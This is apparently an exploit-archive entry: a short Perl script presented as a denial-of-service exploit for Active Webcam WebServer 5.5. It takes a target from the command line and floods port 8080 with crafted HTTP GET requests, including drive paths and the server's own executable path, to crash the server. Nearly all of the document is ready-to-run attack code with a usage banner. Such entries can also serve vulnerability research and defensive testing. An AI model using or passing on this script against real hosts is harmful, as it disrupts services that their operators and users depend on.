Denial of service exploit for the Active Webcam webserver version 5.5.
43af06f6b9989857961ddbede2f22668b1db4d7847fed577caa4911531fb3b13
#PY Software Active Webcam WebServer 5.5 DoS
#Coded bY ++Karak0rsan++
use IO::Socket;
$host=$ARGV[0];
$port=8080;
if(!$ARGV[0]){
print "PY Software Active Webcam WebServer DoS\n";
print "Coded by ++Karak0rsan++\n";
print "Usage:perl $0 [target]\n";
}
use IO::Socket;
$socket = new IO::Socket::INET( PeerAddr => $host,
PeerPort => $port,
Proto => 'tcp',
Type => SOCK_STREAM, );
close($socket);
if($socket){
print "[+]Attacking...!\n";
}
for($i= 0; $i < 10; $i++)
{
$socket1 = new IO::Socket::INET( PeerAddr => $host,
PeerPort => $port,
Proto => 'tcp',
Type => SOCK_STREAM, ) or die "Check your target address!\n";
print $socket1 "GET /A:\a.txt HTTP/1.0\r\n";
print $socket1 "GET /Filelist.html HTTP/1.0\r\n";
close($socket1);
}
for($i= 0; $i < 400; $i++)
{
$socket2 = new IO::Socket::INET( PeerAddr => $host,
PeerPort => $port,
Proto => 'tcp',
Type => SOCK_STREAM, );
print $socket2 "GET /C:\Program Files\Active WebCam\WebCam.exe
HTTP/1.0\r\n";
close($socket2);
}
print "Operation Completed :)\n";
exit();